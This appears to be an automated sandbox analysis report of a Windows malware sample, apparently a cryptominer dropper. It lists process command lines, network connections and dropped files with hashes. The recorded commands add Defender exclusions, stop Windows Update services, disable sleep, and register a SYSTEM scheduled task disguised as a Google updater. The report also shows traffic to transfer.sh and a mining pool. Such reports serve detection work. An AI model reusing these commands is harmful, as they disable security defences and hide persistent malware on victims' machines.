C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54160 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2800 --field-trial-handle=1000,i,12582465309236691494,10646425831562605586,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\system32\taskeng.exe

taskeng.exe {5E315D82-D326-4C08-ADF6-20540F01716B} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2004 --field-trial-handle=1000,i,12582465309236691494,10646425831562605586,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 209.250.248.11:33522 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.68:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ogs.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.162:443 googleads.g.doubleclick.net tcp
NL 142.250.179.162:443 googleads.g.doubleclick.net udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.54:443 i.ytimg.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp

Files

memory/2148-54-0x0000000000220000-0x0000000000249000-memory.dmp

memory/2148-55-0x00000000002D0000-0x000000000030F000-memory.dmp

memory/2148-56-0x0000000000400000-0x00000000018C7000-memory.dmp

memory/2148-57-0x0000000005E80000-0x0000000005EC0000-memory.dmp

memory/2148-58-0x00000000034A0000-0x00000000034D8000-memory.dmp

memory/2148-59-0x0000000074D70000-0x000000007545E000-memory.dmp

memory/2148-60-0x00000000034E0000-0x0000000003514000-memory.dmp

memory/2148-62-0x0000000003510000-0x0000000003516000-memory.dmp

memory/2148-63-0x0000000005E80000-0x0000000005EC0000-memory.dmp

memory/2148-61-0x0000000005E80000-0x0000000005EC0000-memory.dmp

memory/2148-64-0x0000000005E80000-0x0000000005EC0000-memory.dmp

memory/2148-65-0x0000000000400000-0x00000000018C7000-memory.dmp

memory/2148-66-0x0000000000220000-0x0000000000249000-memory.dmp

memory/2148-67-0x00000000002D0000-0x000000000030F000-memory.dmp

memory/2148-68-0x0000000074D70000-0x000000007545E000-memory.dmp

memory/2148-69-0x0000000005E80000-0x0000000005EC0000-memory.dmp

memory/2148-70-0x0000000005E80000-0x0000000005EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC795.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarC892.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

memory/2148-164-0x0000000009300000-0x000000000958B000-memory.dmp

memory/2020-167-0x0000000000F10000-0x000000000119B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2148-177-0x0000000009300000-0x0000000009934000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2240-178-0x0000000000030000-0x0000000000664000-memory.dmp

memory/2240-179-0x0000000077E60000-0x0000000077E62000-memory.dmp

memory/2240-181-0x0000000000030000-0x0000000000664000-memory.dmp

memory/1212-189-0x000000013F950000-0x0000000140B76000-memory.dmp

memory/2240-188-0x0000000000C30000-0x0000000000CA0000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2020-180-0x0000000000F10000-0x000000000119B000-memory.dmp

memory/1212-192-0x000000013F950000-0x0000000140B76000-memory.dmp

memory/1212-191-0x000000013F950000-0x0000000140B76000-memory.dmp

memory/1212-190-0x000000013F950000-0x0000000140B76000-memory.dmp

memory/1212-193-0x0000000077C70000-0x0000000077E19000-memory.dmp

memory/2240-201-0x0000000005CA0000-0x0000000005D52000-memory.dmp

memory/2240-200-0x0000000005E90000-0x0000000005ED0000-memory.dmp

memory/2240-199-0x0000000005E90000-0x0000000005ED0000-memory.dmp

memory/2240-198-0x0000000005E90000-0x0000000005ED0000-memory.dmp

memory/2240-197-0x0000000074D70000-0x000000007545E000-memory.dmp

memory/1212-196-0x000000013F950000-0x0000000140B76000-memory.dmp

memory/2240-195-0x0000000003020000-0x000000000308C000-memory.dmp

memory/1212-194-0x000000013F950000-0x0000000140B76000-memory.dmp

memory/2612-202-0x0000000000400000-0x0000000000527000-memory.dmp

memory/2148-182-0x0000000000400000-0x00000000018C7000-memory.dmp

memory/2612-204-0x0000000000400000-0x0000000000527000-memory.dmp

memory/2612-212-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2148-209-0x0000000074D70000-0x000000007545E000-memory.dmp

memory/2240-207-0x0000000005E90000-0x0000000005ED0000-memory.dmp

memory/2612-214-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2240-249-0x0000000000030000-0x0000000000664000-memory.dmp

memory/2612-251-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-225-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2612-273-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-272-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-271-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-270-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-269-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-268-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-267-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-266-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-265-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-264-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-263-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-262-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-261-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-260-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-259-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-258-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-257-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-256-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-255-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-254-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-253-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-252-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-250-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-277-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-276-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-275-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-274-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-278-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-281-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/1212-279-0x000000013F950000-0x0000000140B76000-memory.dmp

memory/2612-282-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-285-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-286-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-287-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-288-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-289-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2020-291-0x0000000000F10000-0x000000000119B000-memory.dmp

memory/2612-290-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-292-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2612-293-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Local State

MD5 50fb7abd21ba4f987bf3be48df13f9d9
SHA1 59a16fb4f03c0ee5cfe31cb42d8ff89efc1f350a
SHA256 411cc727e62f2ff875d772fc4e088b2b1ef976dedb829749a9401103e7f55e56
SHA512 1a6c419f24a8f19bf16fb38f08439e04f072dd4896ad8d45bbfa1b76c6eddfc2ad92f3103b9b02b7edda6df9c56c1f13de4c2eb2461e1094075ced6174f5e394

memory/2612-328-0x0000000077E6F000-0x0000000077E70000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\??\pipe\crashpad_2040_RSAGGLXMZHBELWPX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Local Storage\leveldb\LOG

MD5 7be49c40ae537f55a1ceb689b0529eac
SHA1 273c06f0ca53004f6ba0e215ced965203bdece71
SHA256 ab3739d18a3e48810f9259711d0cc5081b25c4f93452f95a5f57a22882148a3e
SHA512 49e7f3ad0bec2a9095a0267d2a0e9ca80903cd65328502400981c8bedc069f03ffa6a57443928f9fa31a413c08e279269cea5a9e8e06058258278f05adf0d798

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Local Storage\leveldb\LOG.old

MD5 988514fc923d5b8040299ac3a531d24f
SHA1 c998e4171741dcc35f992ba638df1919a2432aef
SHA256 6784fa9f8ca570fde0a41b80513f7b612f6d7729a34cb9f921c9b16ba17f8043
SHA512 34362494a11d96de17e943353d25b7bf0c16a470a588028caa868ae1a2ce3add4d9b2430445266b527fd316c390cee58cd128392f89e95a4545e5d9ee2370c46

memory/752-356-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

memory/1212-365-0x000000013F950000-0x0000000140B76000-memory.dmp

memory/752-360-0x0000000002250000-0x0000000002258000-memory.dmp

memory/752-366-0x000007FEF41A0000-0x000007FEF4B3D000-memory.dmp

memory/752-368-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/752-369-0x000007FEF41A0000-0x000007FEF4B3D000-memory.dmp

memory/752-370-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/1212-371-0x0000000077C70000-0x0000000077E19000-memory.dmp

memory/2240-372-0x0000000074D70000-0x000000007545E000-memory.dmp

memory/2240-373-0x0000000005E90000-0x0000000005ED0000-memory.dmp

memory/752-375-0x00000000025E4000-0x00000000025E7000-memory.dmp

memory/752-376-0x00000000025EB000-0x0000000002652000-memory.dmp

memory/752-377-0x000007FEF41A0000-0x000007FEF4B3D000-memory.dmp

memory/2240-379-0x0000000005E90000-0x0000000005ED0000-memory.dmp

memory/2240-380-0x0000000002BE0000-0x0000000002C22000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 3b0c258858322aad0e6a347dec427d0c
SHA1 204a3f9877eec7777a79a372fe0c76a7a86f8ee4
SHA256 835d2eb3afaba07002be454d4ae4dcf843f8bb33bb3f0cc721746c9eb7562586
SHA512 15baac8b39bc9d5ae4a0f9cf5f6a9b2b2be54d1085c7d68e479645e150b03766218d011a0e2058891a99e1e44f0fd6564998d391184609303d3b3ff9ade2f353

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CP29YH12D3XTPIF6SUUN.temp

MD5 3b0c258858322aad0e6a347dec427d0c
SHA1 204a3f9877eec7777a79a372fe0c76a7a86f8ee4
SHA256 835d2eb3afaba07002be454d4ae4dcf843f8bb33bb3f0cc721746c9eb7562586
SHA512 15baac8b39bc9d5ae4a0f9cf5f6a9b2b2be54d1085c7d68e479645e150b03766218d011a0e2058891a99e1e44f0fd6564998d391184609303d3b3ff9ade2f353

memory/1504-396-0x000007FEF4100000-0x000007FEF4A9D000-memory.dmp

memory/1504-395-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/1504-394-0x000000001B290000-0x000000001B572000-memory.dmp

memory/1504-400-0x0000000002750000-0x00000000027D0000-memory.dmp

memory/1504-399-0x0000000002750000-0x00000000027D0000-memory.dmp

memory/1504-398-0x000007FEF4100000-0x000007FEF4A9D000-memory.dmp

memory/1504-397-0x0000000002750000-0x00000000027D0000-memory.dmp

memory/1504-401-0x0000000002750000-0x00000000027D0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataEKNAS\Default\Session Storage\CURRENT~RFf77426d.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/1504-417-0x000007FEF4100000-0x000007FEF4A9D000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

